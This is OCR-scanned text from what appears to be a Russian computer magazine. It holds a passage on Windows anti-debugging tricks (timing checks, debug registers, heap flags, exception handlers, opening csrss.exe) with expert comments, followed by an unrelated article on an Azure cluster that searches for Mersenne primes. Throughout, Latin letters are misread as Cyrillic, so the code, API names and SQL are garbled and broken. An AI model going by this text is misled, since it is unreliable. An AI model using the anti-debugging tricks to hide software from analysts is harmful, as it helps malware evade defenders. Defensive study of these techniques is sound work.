ПерехватВОТ$С в РВатОт 


ОК Е 


мени и проконтролировав регистр еах до и по- 
сле выполнения команды. Если его содержимое 
не изменилось, то налицо перехват РОТЗС. Эту 
проверку лучше засунуть в отдельный поток, что- 
бы не задерживать выполнение основного. 

Перехват Се скСоит тоже может присут- 
ствовать в плагинах, и его легко определить таким 
вот кусочком кода: 


ОмОКО Т1те$фагЕ = бееТ1скСоипт*(); 
5$1еер(100); 
ОмОКО Т1теЕпа = бееТ1скСоип*(); 


Если разница между ТитеЕпа и Ттезан 
меньше законной сотни, то Се скСоит явно пе- 
рехвачена и висит под контролем какого-нибудь 
плагина. 

Все перечисленное поможет выявить отлад- 
чик при трассировке программы. 

Для выявления отладчика при обыч- 
ном выполнении команд может помочь 
АРГ МОчегутогтайопРгосез$ в паре с АР 
СебузчетТитеА$ЕЙеГ!те: 


_азт 
у 
ризй @ 
ризй @х20 
ризй Т1те5фагЕРо1п{фег 
// Ргосез$ТпРогта1опС1а$$_ = 
// Ргосе$$Т1те$ 
ризй @х4 
ризй Ргосе$$ТО 
са11 МЕОчегуТифРогта*1опРгосе$$ 
} 
беЕ5узетТ1тед$Е11еТ1те+ = 
(ЕРЕТЕЕТТМЕ (&Т1теЕпа)); 
1+ ((Т1лмеЕпа. ам омбажеТ1те - 
Т1те`фаге. СгеаеТ1те .[омРаг®) > ‹= 
Т1тее1т1е) 
гефиги гие; 
е15е 


Аппаратные точки останова в ОПуОБа 


гефигп Фа15$е; 


Кроме этого, в М/паом$ \УМ$а и выше мож- 
но воспользоваться особенностью выполнения 
функции ОбаРищЕх, ход выполнения которой 
под отладкой отличается от обычного и функция 
выполняется дольше (для этих целей также от- 
лично подойдет и Омршиериа ипоа, но бывает 
иногда так, что ее контролируют антиотладочные 
плагины). 


ОТЛАДОЧНЫЕ РЕГИСТРЫ 

Ненулевое значение специальных отладочных ре- 
гистров процессора запросто может послужить 
фактом, подтверждающим отладку программы. 
Просто так узнать их содержимое не получит- 
ся, и для этого можно либо вызвать исключение 
и прочитать контекст потока, либо воспользовать- 
ся функцией СеЙИгеааСощехЕ: 


беЕТИгеаЯСоп*ех* (ТпгеаЧНапа1е, ‹= 
&ТргеааСоптехе) 
1+ ((ТИгеаЧСоп%ех*.Ог@ != 0) | | (ТИгеад+= 
Сопфехе.0г1 != 0) | | (Тпгеа9Соп*ех& . = 
Ог2 != 9) | | (ТигеадСопеех* .Ог3З != @)) 
гефиги гие; 
е15е 
гефигп Фа15$е; 


ФЛАГИ ОТЛАДКИ, КУЧИ И ПРОЧЕЕ 
Наверное, только ленивый не проверял флаг 
Ветод)ебиодщеч в своих программах, пытаясь за- 
щитить их от незадачливого взломщика. Более 
того, не секрет, что |5ВебиадегРгезещ использует 
его для своей работы, поэтому на различных фла- 
гах, состояние которых указывает на наличие от- 
ладчика, долго останавливаться не будем. 
Значение ЕЕС_ НЕАР_ ЕМАВЕЕ ТАШ_СНЕСК 
в МОАюораЕгад указывает диспетчеру кучи, 
что идет процесс отладки и в конце каждого бло- 
ка, выделяемого из кучи, нужно помещать сиг- 
натуру в виде восьми байт ОхАВ для контроля 
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ВетдадеБиддед 
№СоБа!РИад 


РогсеНад 


Ка)еБиддегЕпаЫеад 
(изегто4е) 


Ка)еБиддегЕпаЫеад 
(Кегпе! то4е) 


ОНУОБЗ 1.10 


ОПуОБда 2.01 


МИпоБо 6.12 


!ттипйу ебиддег 1.85 ттипну Оебиддег.ехе |ттипКу Оебиодег-[СРУ] 


тоу еах, +5: [90х30] 

тому ебх, [еах + 09х18] 

// Адрес начала кучи 

тоу 5фагЕНеарАд4Чг, ебх 

тому есх, [ебх + 0х3з8] 

// Адрес конца кучи 

том ЕпаНеарАаЧг, есх 

} 
Неар = (ОмОвО*)5ФагЕНеарАааг; 
// Сканируем кучу на предмет наличия 
// @хабабаБаЬ 
Фог(ОМОВО 1паех = 9; 1паех <= «= 
ЕпаНеарАааг - 5фагЕНеарАадаг; 1пдех++) 


1+ (Неар1паех / 4 (== 9хаБаБаБаБ) 
геЕиги гие; 


| 


Если так поступить с кучей, выделяемой 
для процесса по умолчанию, то можно обойти 
корректировку \СюорБа!аа, производимую неко- 
торыми плагинами для ОПУОБа (в частности, ОПу 
Аауапсеа и Нае Оебидадег). 

Кроме всего этого, можно использовать АР|- 
функции АИО@чегуРгосезНеарштоптайоп или В1 
ОчегуРгосезВеридштогтайоп, с помощью кото- 


карербиддегЕптпаЫеа, 
КаребиддегМо{Ргезет 


можно лекго проверить, воспользовавшись 
функцией №Очегубу“еттогтаНоп, вызвав ее 
с пюптаНоп(а$$, равным 0х23. 


ЗЕН (УЕН) ОБРАБОТЧИКИ 
Если установить свой обработчик событий с по- 
мощью функций ЗеУппапеаЕхсернопЕР ег или 


| можебаь, | меуньлваь | мижябиыо | тм. 


КУ$ЕВ_$ЗНАВЕО_ОАТА+0х244 
(0х7е0244) 
0х82668368 

Ка)ериддегМо{Ргезет 0х82568368 
(Кегпе! то4е) 


Флаги, по которым можно определить наличие отладчика 


ОПуОБд 1.10+Наеб)еБиддег — оцвекЕ | ЧМ | 


Библиотека антиотладчика 


РЕВ+0х02 РЕВ+0х02 


[РЕВ+0х30]+0х70 


[РЕВ+0х30]+0х74 


КУ$ЕВ_$НАНЕО_ОАТА+0х244 
(0х000000007Не0294) 


0х 80003279310 


0х8 0003279311 


оуове 
оцУове 
оцуове 


МИпоБаЕгатеС!а$$ 


НЕАР_РЕВЕЕ_СНЕСКМС_ЕМАВЕЕО 


НЕАР_$КР_УАНОАТОМ_СНЕСК$ 
НЕАР_\УАНОАТЕ_РАВАМЕТЕН$_ЕМАВЕЕО 


НЕАР_ТАШ_СНЕСКМС_ЕМАВЕЕО 


НЕАР_ЕВЕЕ_СНЕСКМС_ЕМАВЕЕО 
НЕАР_\УАНОАТЕ_РАВАМЕТЕН$_ЕМАВЕЕО 


НЕАР_ТАШ_СНЕСКМС_ЕМАВЕЕО 
НЕАР_ЕВЕЕ_СНЕСКМС_ЕМАВЕЕО 


НЕАР_\УАНОАТЕ_РАВАМЕТЕН$_ЕМАВЕЕО 0х40000000 


Значения флагов №СоБа! Лад, Е!ад$ и РЕогсе[!ад, 
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РЕС_НЕАР_ЕМАВЕЕ ТА! СНЕСК 0х00000010 
РЕ@_НЕАР_ЕМАВЕЕ ЕВЕЕ_СНЕСК 0х00000020 


ЕЕб_НЕАР_\УАНОАТЕ_РАНАМЕТЕН$ 


0х00000040 


Надз$ (Мп ХР) млпаБд.ехе 


НЕАР_СВО\М/ГАВЕЕ 0х00000002 


НЕАР_ТАШ_СНЕСКМС_ЕМАВЕЕО 


0х00000020 
0х00000040 
0х10000000 


0х40000000 


0х00000002 
0х00000020 
0х00000040 


0х40000000 


0х00000020 
0х00000040 


Рад (Мп Ма, 7) 
НЕАР_СВО\М/АВЕЕ 


Рогсе[!ад 


показывающие наличие отладчика 


Ааа\естогедЕхсерНоп Р[Ег, а затем сделать в про- 
грамме какое-нибудь исключение, то под отлад- 
чиком установленный нами обработчик вызывать- 
ся не будет, и эта особенность может помочь нам 
зафиксировать факт отладки. 

Используя контекст, передаваемый в обработ- 
чик, можно подправить счетчик команд и после 
выхода из обработчика продолжить выполнение 
команд в нужном нам направлении (код, который 
позволит это сделать, смотри на диске). 


ОСОБЕННОСТИ ОТЛАДОЧНОГО 
РЕЖИМА\ИМООМ/$ 

Очень многие АР!-функции (или их последова- 
тельности) по-разному себя ведут при обычном 
выполнении или при выполнении под отладчи- 
ком. 

Кпримеру, уже упомянутая функция ОбдРищЕх 
(или Ошрыбебиа та) при выполнении под от- 
ладчиком вызывает АР! ИмОчцегудебидоРЩег$«е, 
а без отладчика вызова этой функции не происхо- 
дит (за счет чего она, собственно, под отладчиком 
дольше и выполняется). Перехватив и отследив 
вызов этой функции, можно засечь факт отладки. 

Благодаря возможности подгружать файлы 
с отладочными символами вместе с загружаемой 
библиотекой в отладчике \\МтпОБа и встроенном 
в \зиа| ЗЗиЧю отладчике можно легко распознать 
их наличие: 


НМОБУЕЕ ПЁ1Ь6гагу = оаа16гагу‹ = 

ЕВЕ О. 

ТЕ (1 (Сгеажег1ТедА("па11.а11" ‚= 

СЕМЕКТС_ВЕАО,0,0,3,0,0)) == -1) 
гефигп гие; 


// Или вот так 

НМОБИЕЕ ПЁ16гагу = Гоаа16гагу‹ = 

Оо о ВЮ 

НАМОЕЕ ИВез = Веё1пИрдаевезоигсед+ + 

Ее. 911,9). 

1+ (ЕпаУрда*жевезоигсеА(ИВез, 0) == 9) 
гефиги гие; 


Суть этого кода заключается в том, что под от- 
ладкой при открытии библиотеки, к примеру та1. 
ЧИ, отладчик ждет загрузки файла с символами 
и других манипуляций с файлом открываемой би- 
блиотеки некоторое время делать не позволяет. 

Если для существующего файла сделать 
Стежег!е с параметром ОРЕМ_ЕХ!ЗТИМС, затем 
установить для него НАМОЁЕЕ ЕЕАС_РРВОТЕСТ_ 
ЕАОМ СШО$ЗЕ с помощью ЗеНапептогтаноп 
и далее попытаться закрыть все это дело с по- 
мощью С!о5еНапае, то под отладчиком вылезет 
исключение, чем мы с успехом можем восполь- 
зоваться: 


ву 
{ 
НАМОЕЕ КЕ1]е = СгеафеЕ11еА+» 
(аи х Тез. сх о, 9 В 
ОРЕМ_ЕХТЬТТМС, 06, 090); 
5е{Напа1еТифогта* 1 оп (ИЕ11е, <= 
НАМОЕЕ_ЕЁЕАб_РВОТЕСТ _ЕВОМ_СТО$Е, += 
НАМОЕЕ_ЕТАб_РВОТЕСТ_ЕВОМ_С10$Е); 
С1оеНапа1е(ВЕ11е); 
гефигп Фа15$е; 


} 
__ехсер* ( ЕХСЕРТТОМ_ЕХЕСИТЕ_НАМОЕЕВ) 


{ 


гефигп гие; 


} 


Если учитывать, что отлаживаемый процесс 
должен иметь привилегии отладчика, да и от- 
ладчик, как правило, без административных прав 
запускается редко, то мы можем поиметь нужный 
нам результат. 

Это можно сделать, попробовав открыть си- 
стемный процесс с$г$$.ехе. Если удалось, значит, 
у испытуемого процесса с привилегиями отлад- 
чика все в порядке: 
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ттиййу : й 
И: О О НН ао5 


НИЖНИЙ 
О И ПО ООО ОО ООО ПО ООО ООО 
О СЕ ИИ: 
[оон ООО ОО и 


павоеховичол (во ИРЕХСЕРТОН)_—_—_ ООО ИИ В 
вавееховрног (ово сонтНоь ©) 
ар ОИ О О О О ООО ООН 


Реакция разных отладчиков наисключения 


СэгбееРгосе$ТАа // Получаем Та 
// с5г$5.ехе 


С5К55Та, еах 


} 


//_ Пытаемся открыть с5г$5.ехе 
1+ (ОрепРгосе$$(РВОСЕ$$ _АЕЕ_АССЕЗЗ, «= 
сес) Е И) 

гесиги гие; 


Для этих же целей можно задействовать функ- 
цию ОразебериаЕЩегж«е, которая возвращает 
ненулевое значение, если процесс выполняется 
с админскими правами и имеет отладочные при- 
вилегии: 


0655е{БеБиЕ11Фег5{а®е 
Е]аё, еах 


} 
ВЕТ ае чЕ=8)) 
гесигп Тгие; 


Еще можно попытаться отсоединить от- 
лаживаемый поток от отладчика с помощью 


ОТ ЭКСПЕРТА 


функции  ШМ$ФейптоптанопТигеаяа с параме- 
тром  ТпгеаатюгтаНоп аз$, равным —0х11 
(ТргеааНаеЕтотВОербчосщег): 


90х11 
ый 


МЕ5еТпРогта*1опТИгеаа 


ПРОЦЕССЫ, ОКНА, БИБЛИОТЕКИ 

И ДРУГИЕ ОТЛАДОЧНЫЕ АРТЕФАКТЫ 

Как нетрудно догадаться из заголовка раздела, 
любой отладчик имеет какое-нибудь имя про- 
цесса, открытые окна, загруженные библиотеки 
и драйверы. 

Все это достаточно легко выявить, просто за- 
действовав некоторые функции, любезно прело- 
ставленные в наше распоряжение операционной 
системой. 

Это, к примеру, СгезмеТоойер32$парзйо{ со- 
вместно с Ргосез$32Еи$ и Ргосе$$32Меж для по- 
иска нужного процесса или Нпо\\/таом/ для поис- 
ка нужного окна. 


Если надумаешь использовать этот прием, 
то следует учесть наличие плагинов к ОПУОБсд, 
которые контролируют эти функции. В неко- 
торых случаях можно использовать функцию 
СейазЕгтог после вызова нужных функций. Дело 
в том, что некоторые плагины просто имитируют 
неудачное срабатывание этих функций, и несо- 
ответствие возвращенного ошибочного значения 
значению, возвращаемому Сейа$Етгог, поможет 
это выявить. 

Использовав функцию ЖОчцегутогтайопРго- 
се5$$ 0х1{ (РгосеззВеридОЩесцНапа!е) или 0х1е 
(Ргосез$ВебидНад$), можно определить факт 
отладки по наличию различных объектов отладки 
(соответствующий код ты найдешь на диске, при- 
лагаемом к журналу). 

Кроме всего этого, можно определить имя 
родительского процесса, и, если оно отлично 
от ехрогегехе или ста.ехе, возможно, стоит за- 
подозрить неладное. 


ЗАКЛЮЧЕНИЕ 

Конечно же, это не все. Это далеко не все. Тема 
антиотладки глубока, обширна и, наверное, бес- 
конечна, а журнал и объем статьи, к сожалению, 
такими свойствами не обладают. Что ж, наде- 
юсь, у меня будет возможность еще чем-нибудь 
с тобой поделиться по этой теме в следующих 
номерах. = 


Вячеслав Закоржевский, «Лаборатория Касперского» 
Чем знаменит: крутой парень, настоящий человек-дизассемблер 


В статье приводится хорошая классификация антиотладочных приемов 
и соответствующие примеры. Подобные техники активно используются 
в разном программном обеспечении. Однако стоит отметить, что в исполь- 
зовании антиотладки больше заинтересованы те, кто хочет защитить код 
программы. И это далеко не всегда вирусописатели. Множество техник 
защиты от отладки используется в коммерческих упаковщиках, которые 
применяются для защиты легального ПО от реверса. Злоумышленники, ко- 
нечно, тоже не против усложнить разбор «начинки» своего поделья, но так 
как для них это не несет прямого ущерба (в отличие от софта, для которого 
можно разобрать, например, генерацию кода активации), то и много вре- 
мени на это не тратится. Вирусописатели в первую очередь думают о мо- 
нетизации и защите детектирования своих продуктов, поэтому акценты 
при написании защитных механизмов несколько смещены в сторону обфу- 
скации и прочего. 


Александр Матросов, ЕЗЕТ 
Чем знаменит: очень крутой парень 


Антиотладочные приемы встречаются практически в любой вредоносной 
программе. И если раньше разработчики вредоносных программ стреми- 
лись главным образом усложнить антивирусным компаниям анализ и тем 
самым замедлить выход вакцины, то на сегодняшний день засилье раз- 
ношерстных троянцев не требует зачастую досконального изучения вре- 
доносной программы для добавления ее в антивирусные базы. И сегодня 
основная цель разработчиков вредоносных программ состоит уже не в про- 
тивостоянии с аналитиком, а в противодействии различным авторизиро- 
ванным системам для анализа новых образцов вредоносных программ, так 
называемым песочницам. Да и сами антиотладочные трюки ведут себя по- 
рой не очень стабильно на различных ОС или зависят от конкретной версии 
сервис-пака или ядра. Поэтому в современных вредоносных программах 
мы чаще встречаем что-нибудь интересное с точки зрения обнаружения вы- 
полнения на виртуальных машинах, нежели хитрые антиотладочные трюки. 
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ГОЛУБОЙ 


Делаем систему распределенных вычислений на УЛпдом/$ Агиге 


Есть у нас в редакции специальные весы, на которых мы взвешиваем добрые и злые деяния 
корпорации М!сго$оН. Гениальная \ММпаом/$ ХР склоняет их в сторону добра, а вот то, что они сде- 
лали с офигенной, опередившей свое время \ММпаом/$ Моше 6.х, мощно тянет рычажные весы 

в обратную сторону. Но сегодня речь идет не об операционных системах, а о модных и популяр- 
ных облачных платформах, в сфере которых корпорация тоже неплохо отметилась. 


ВВЕДЕНИЕ 

Раныше многие из ученых не могли и мечтать о по- 
лучении доступа к мощностям суперкомпьюте- 
ров. Покупка их времени по-прежнему остается 
дорогим удовольствием. Однако сейчас многие 
компании на рынке облачных вычислений предо- 
ставляют тестовый доступ к своим ресурсам, ис- 
пользуя которые можно за небольшую плату соз- 
дать собственный кластер. 

Есть множество проектов, посвященных рас- 
пределенным вычислениям для решения важных 
задач: проектирование ускорителей элементар- 
ных частиц, поиск в космическом шуме сигналов 
внеземных цивилизаций... В нашем проекте мы 
будем решать задачу создания распределенной 
системы для поиска простых чисел. 

Из курса математики тебе должно быть из- 
вестно, что простое число — это натуральное чис- 
ло (то есть целое положительное), которое имеет 
ровно два различных натуральных делителя: еди- 
ницу и само себя. К простым числам относятся: 2, 
3, 5, 7, ... перечислять можно бесконечно долго. 
Один из самых известных алгоритмов для вы- 
числения простых чисел — решето Эратосфена. 
Однако существует ряд специализированных 
алгоритмов, которые предназначены для опре- 
деления простоты чисел специального вида. 
Например, тест Люка — Лемера может исполь- 
зоваться для поиска простых чисел Мерсенна, 
которые имеют следующий вид: Мр = 2р - 1 (про- 
стота числа 2р - 1 указывает на простоту числар). 
Именно данный алгоритм использует проект рас- 
пределенных вычислений СМР$ (тегзеппе.ого). 
В январе 2013 года с помощью этого проекта было 
найдено очередное число Мерсенна: М57885161, 
которое состоит из 17 425 170 десятичных цифр. 

Американская некоммерческая правозащит- 
ная организация Нестотюс Егопйег РГоипдайоп 
(ЕРЕ Фонд электронных рубежей) обещала на- 
граду за нахождение простых чисел, состоя- 
щих более чем из 108 и 109 десятичных цифр, 


в размере 150 тысяч и 250 тысяч долларов 
(мимим.е Г. ога/амиага$/соор). 

Описываемый проект предназначен для поис- 
ка простых чисел Мерсенна. И кто знает — может 
быть, именно ты сможешь найти следующее про- 
стое число и немного подзаработать. 

Одна из компаний, предоставляющих те- 
стовый доступ к своим облачным ресурсам, — 
М!сго5ой. Для тестирования \М/Ипао\м/$ Агиге она 
дает один месяц «бесплатный кредит» в размере 
200 долларов. Этот кредит ты можешь использо- 
вать для покупки сервисов Алгиге по своему усмо- 
трению. Например, за эти деньги можно купить 
три экземпляра \М/огкег-сервиса и ЗО( базу дан- 
ных размером 2 Гб. Для получения кредита по- 
требуется банковская карта. Здесь: аоо.а/ЗХ@иСс 
описан способ использования виртуальной карты 
взамен реальной. Конечно, 200 долларов — это 
не так много, как хотелось бы, но, попросив помо- 
щи удрузей и родственников, ты вполне сможешь 
создать неболышую вычислительную сеть. 

Для разработки проекта системы тебе по- 
надобится \\Мпао\м$ Атиге ЗОК для .МЕТ ко- 
торый можно скачать по следующей ссылке: 


аоо.аШСКОР. 


СТРУКТУРАСИСТЕМЫ 
В структуру распределенной системы вычисле- 
ний входит сервер, несколько вычислительных 
клиентов, а также клиентское приложение, запу- 
скаемое на компьютере пользователя (управля- 
ющий клиент). Каждый из элементов системы — 
проект, отдельно созданный в Миа! Зтиаю. 
Сервер и вычислительный клиент представ- 
ляют собой облачные сервисы, которые реализо- 
ваны в виде \\№огкег-ролей. Клиент, запускаемый 
на компьютере пользователя, реализован в виде 
оконного приложения на основе технологии 
\Мпаомиз$ РГопт$. При развертывании вычисли- 
тельного клиента можно указать, что должно вы- 
полняться несколько экземпляров роли. В рамках 


одного облачного сервиса несколько экземпля- 

ров одной роли будут выполняться независимо, 

так, как если бы они выполнялись на разных ком- 
пьютерах. 

Задача сервера — раздавать облачным кли- 
ентам диапазоны чисел для их проверки на про- 
стоту, а также регистрировать клиенты, выпол- 
няющие вычисления. Каждый облачный клиент 
выполняет одинаковые действия: он запраши- 
вает у сервера диапазон чисел, которые дол- 
жен проверить на простоту, проводит проверку 
и результаты проверки сохраняет в базу данных. 
Клиент, выполняющийся на пользовательском 
компьютере, служит для управления процессом 
вычислений, а также для взаимодействия с базой 
данных, в которой находятся результаты провер- 
ки чисел. Рисунок поясняет потоки данных между 
элементами распределенной системы. Сервер, 
функционирующий в облаке, должен запуститься 
до начала работы клиентов, так как перед началом 
вычислений клиент должен зарегистрироваться 
на сервере. 

Протокол работы системы следующий. 

1. Запускается сервер: при запуске сервер счи- 
тывает значение максимального проанализи- 
рованного на простоту числа из базы данных; 
это значение будет использоваться далее 
в качестве инициализирующего; по умолча- 
нию после запуска сервера ему запрещается 
раздавать данные для обработки вычисли- 
тельным клиентам. 

2. Запускаются и регистрируются на сервере 
вычислительные клиенты. 

3. После запуска вычислительный клиент с по- 
мощью таймера начинает запрашивать у сер- 
вера данные для вычислений, однако эти дан- 
ные не будут доступны, пока управляющий 
клиент не разрешит серверу раздачу данных. 

4. Каждому вычислительному клиенту сервер 
выдает одно число (р), определяющее начало 
диапазона из 100 чисел, которые должен про- 
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верить клиент; после того как вычислительный 
клиент получает очередное задание, он начи- 
нает анализ чисел на простоту с помощью те- 
ста Люка — Лемера и записывает результаты 
анализа в базу данных. 


ПРОГРАММНАЯ РЕАЛИЗАЦИЯ 


Сервер 

Сервер описываемой системы представляет 

собой \М/СЕ-службу. Клиент взаимодействует 

со службой, запущенной на сервере, посред- 
ством конечной точки. В состав конечной точки 
входит: 

. привязка, которая задает способ связи клиен- 
та со службой; в нашем проекте служба вза- 
имодействует с клиентами по протоколу ТСР 
поэтому для создания привязки используется 
класс Ме]срВтато; 

. адрес, по которому выполняется подключение 
к конечной точке; для протокола ТСР адрес 
записывается в следующем формате: пе. 
{ср://<сервер>:<порт>/<служба>; 

. контракт; учитывая возможности развития 
проекта, я реализовал дуплексный контракт, 
то есть в этом случае клиент и служба смо- 
гут обмениваться сообщениями. Дуплекс- 
ный контракт определяет операции, которые 
может вызывать клиент на службе и служба 
на клиенте. Данный контракт описывается 
в виде двух интерфейсов: 1Спет (операции, 
которые может вызывать сервер на клиенте) 
и [5егуег (операции, которые может вызывать 
клиент на сервере). 


Клиент для получения данных от сервера вы- 
зывает на стороне сервера метод Сера. После 
вызова данного метода вычислительному клиенту 
отправляется степень р числа Мр для его провер- 
ки на простоту с помощью теста Люка — Лемера. 

Одновременно к серверу для получения вы- 
числительного задания может обратиться не- 
сколько клиентов. Поэтому для обеспечения по- 
токобезопасности кода используется оператор 
|оСк. В случае если два потока одновременно 
пытаются получить значение р, один из потоков 
переходит в состояние ожидания (то есть блоки- 
руется), пока другой поток исполняет критиче- 
скую секцию кода. 

Вот так выглядит генерация набора анализи- 
руемых чисел: 


Ти{32 бе\фБат\а() 
{ 
1+ ((могкегКо1е.соп*го1) && == 
(МогкегКо1е.р >= -1)) 


ы 


Тоск (могкегВо1е.1оскег) 
{ 


// Выдача начального числа р 
// диапазона чисел 

// [р; р + 1989] 

1+ (могкегво1е.р == -1) 

| 


ИогкегкКо1е.р = 191; 
геЕигп 1; 
} 


е1е 


Г 


Ти{32 фтр = МогкегКо]1е.р; 
МогкегкКо1е.р = <= 
МогкегкКо1е.р + 19090; 
гефигп тр; 
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е1 зе 
гефиги -1; 


} 


Код, выполняющий регистрацию клиента 
на сервере, размещается в методе Ведччег($ по 
изегМате, ${иптоа раззНазп, Бос! 15Стезе). В зави- 
симости от значения флага 15Стезже он выполняет 
различные действия: 

. 15Сгеае == тие — на сервере создается учет- 
ная запись пользователя; 


. 15Стезе == тазе — клиент регистрируется 
на сервере. 
Создание учетной записи пользователя 


на сервере выполняет метод Ада(зег. При по- 
пытке регистрации проверяется наличие инфор- 
мации о пользователе в базе данных (эту провер- 
ку выполняет метод ЗеагспОег). В случае если 
пользователь не найден в базе или хеш введен- 
ного пароля не соответствует хешу пароля в базе 
данных, на стороне клиента выводится сообще- 
ние об ошибке. 
Учет пользователей ведется с помощью та- 
блицы и5ег$, в которую входят три поля: 
. 1 — уникальный идентификатор (автоинкре- 
ментное поле); 
. пате — имя пользователя; 
. раззпазй — хеш пароля пользователя, сгене- 
рированного по алгоритму ЗНА-512. 


Вот скрипт создания таблицы для хранения 
информации об учетных записях: 


СКЕАТЕ ТАВЕЕ [4960]. [чъег$] ( 
Те (ТМ ТЕМ. №) МОТ МОЕ 
РВТМАКУ КЕУ, 
пате (_М\/АКСНАК (МАХ) МОТ МУЕЕ, 
раззПазИ (_М\АВСНАВ (МАХ) МОТ Ми 


) 


Давай рассмотрим классы, используемые 
в методах АааУ5$ег и ЗеагспУзег для работы 
с базой данных. Переменная с$, передавае- 
мая в качестве параметра в конструктор класса 
заСоппеснНоп5итпаВийаег, представляет собой 
строку для подключения к ЗОЕ Алиге базе данных. 


В данной переменной хранится адрес сервера 
базы данных, идентификатор и пароль пользо- 
вателя для доступа к серверу, а также некоторые 
параметры подключения. Само же подключе- 
ние создается с помощью класса 5а!Соппесйоп. 
Экземпляр класса 5аСоттапЯ используется 
для хранения выполняемой ЗО! -команды. Дан- 
ный класс предоставляет возможность под- 
становки значений в исходное $О1-выражение. 
Класс 5аЮааВеааег предназначен для получе- 
ния результатов выполнения 5ОЁ-команды. 
Организуем поиск учетной записи: 


риб11с $%г1пв 5еагсПИУзег(${г1па пате) { 
// Создание строки для подключения 
// к базе изег$ 
591Соппес1оп5{г1п2Ви11аег «= 
сопп5{г11п22Ви114ег = пем += 
591Соппес*1оп5{г1п=Ви11аег(с5); 
сопп5{г1п22Ви11аег.Тп1{1а1Са*а1о8 == 
ОБафабазеМате; 
// Подключение к базе данных 
_ [_ $541Соппес1оп сопп_ = пем + о 
5а1Соппес*Топ ( сопп5{г1п=2Ви11Таег . <= 
ТОЗЕРТИе 
5а1СоттапЯ соттапЯ = пиу11; 
5а1БафаКеа4ег геадег; 
сопп.Ореп(); 
// Выборка информации 
// о пользователе 
5&г1па СоттапаТехЕ = "зе1есе * Фгот += 
изег5 мпеге (пате = @пате)"; 
соттапа = пем $491Соттап@а<= 
(СоттапаТехе, сопп); 
соттапа .Рагатетфег$ .Ада ("@пате", <= 
59106Туре.М№/агСпаг); 
соттапа .Рагатетег [ "@пате" ].- 
\Уа1ие = пате; 
геадег = соттапа.ЕхесифеКеааег(); 
// Получение результатов выполнения 
//_ запроса 
ЗЕРЛИР ИМ= 
5Еи1ие И$ = ""; 
ий1]е (геадег.Веаа()) { 
5 = геааег["раззПа$й" ] .+= 
ТОБЕРТИЕ (5 ПЕТИ_)- 
пт = геадег["пате" ] .То5&г1п8(). «= 
Теа: 
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} 


сопп .С10$5е(); 
гефигп 1$; 


И создаем учетную запись: 


руб11с мота АааУзег ($%г1пе паме, «= 
5Ег1п8а ра$$НазИ) 

| 

// Создание строки для подключения 
к БЕ. М-еЕ- 
5а1Соппес1оп5{г1пВи11аег ‹“ 
сопп5{г1152Ви114ег = пем += 
591Соппес*1оп5{г1п2Ви11аег(с$); 
сопп5{г1122Ви11аег.Тп1{1а1Сафа1о8 =: 
ОБафабазеМате; 

// Текст команды 

$г1ип2 СоттапаТехЕ = "1п5еге 1п%0 += 
изег5 (пате, раз$НазП) муа1ие$ «= 
(@пате, @раз5Пазв)"; 

// Подключение к базе данных 
5а1СоппесЕ1оп сопп = пем += 
$91Соппес*1Топ (сопп5{г1п2Ви11аег. «= 
ТОРТ) 

5а1Соттап соттапЯ = пем += 
5а1Соттапа (СоттапаТех*, сопп); 
соттапа .Рагатетег$ .Ада ("@пате", = _ 
59106Туре.М№/агСпаг); 

соттапа .Рагатетег [ "@пате" ].Уа1ие == 
пате ; 

соттапа.Рагате*ег$ .Ааа("@раззПа$В" ‚ == 
5а910ЬТуре. МагСпаг); 

соттапа .Рагатефег [ "@раз5Па$И" ] .+= 
\/а]1ие = раззпазй; 

сопп.Ореп(); 

// Добавление учетной записи 

112 гом5АЧааеЯ = соттапа. += 
ЕхесиеМоп0иегу (); 

сопп.С105е(); 


- 


Вычислительный клиент 
Основная (и единственная) задача вычислитель- 
ного клиента — проверять, является ли число Мр 
простым. Проверить простоту числа Мр = 2р - 1 
можно с помощью такой последовательности 
действий (тест Люка — Лемера): 
1. Задать число (, = 4. 
2. В цикле вычислить значение 

Ее ео (М). 


Таким образом, число Мр является простым, 
если остаток от деления числа 1 - 2 на Мр будет 
равен нулю. 

Давай рассмотрим пример определения про- 
стоты числа Мр = 31 (р=5, Мр = 2°-1=31): 

1. Е =4. 
‚ = (4?-2) тод 31 = 14. 
14? — 2) тоа 31 = 8. 


РЕ 
с 
4. |. = (82 - 1) под 31 = 0. 


= ( 
( 
Тест пройден успешно, следовательно, чис- 


ло 31 простое. 
Тест Люка — Лемера: 


Боо1 15$Рг1те (Ти*32 п) { 
// Проверка на четность 
Ур (2-9) Ро И. (ЕЯ 
е15е 
{ 
О В 
(1пе)МаеВ.5агЕ(п); 1 += 2) 
// Число не простое 
и ЕЮ] 
гебигп Фа1$е; 
// Выполнение теста 


В15Тпезег Мр = В1еТперег. «= 
Ром(2, п) - 1; 


В15Тиерег Ё = 4; 

ВОС Ц Е) 
В ЗВВ С  ОВИоЬ Вы ИЗ 

РВБОРИ ==: 


В тесте Люка — Лемера двойка возводит- 
ся в некоторую степень. Результат возведения 
может быть достаточно большим числом. Боль- 
шим настолько, что для его хранения не хватит 
типа аесита!. Поэтому в клиентском приложении 
для работы с большими целыми числами исполь- 
зуется класс Ващесдег, который находится в про- 
странстве имен Зузет.Митейс$ (библиотека 
Зует.Митепйс$.41). Переменная типа Ватщедег 
может содержать любое целое значение. 

Хранение информации о результатах про- 
верки чисел выполняется с помощью таблицы 
питаа{а, в которую входят следующие поля: 

. 1 — уникальный идентификатор (автоинкре- 
ментное поле); 

пит — проверяемое число; 

зрите — флаг, содержащий результат про- 

верки (простое / не простое); 

Че — время записи информации в таблицу; 

спет{ — информация о клиенте, выполнившем 

проверку. 


Вот скрипт для создания таблицы, хранящей 
результаты вычислений: 


СКЕАТЕ ТАВЕЕ [АБО]. [питдафа] ( 


та ТА -- ОЕМТЕТУ ТТ) МОР МОЕ 
[пит] ВТетмт МОТ МИЕЕ, 
[1зрг1те] ТМТ МОТ МИ, 
[Ча*е] ОАТЕТТМЕ МОТ МИЕЕ, 
с11еп* (_ \АВСНАВ (МАХ) МОТ МИЕЕ, 


_ РАТМАВУ КЕУ СЬУЗТЕВЕО (Та (_А$С) 
у 


Вставку в таблицу питаза информации 
о результатах вычислений выполняет метод 
пзе\РАом/(ш2 пит, оо! 15рите). Логика работы 
данного метода подобна логике метода АдаЦзег. 


Управляющий клиент 

Управляющий клиент контролирует отправку дан- 
ных от сервера клиентам с помощью вызова ме- 
тода Соп\го|. Этот метод позволяет запретить или 
разрешить раздачу вычислительным клиентам 
данных для обработки. 

Если выполняется попытка запуска разда- 
чи данных (Зап == 1гие), тогда сервер выбирает 
из базы данных максимальное вычисленное зна- 
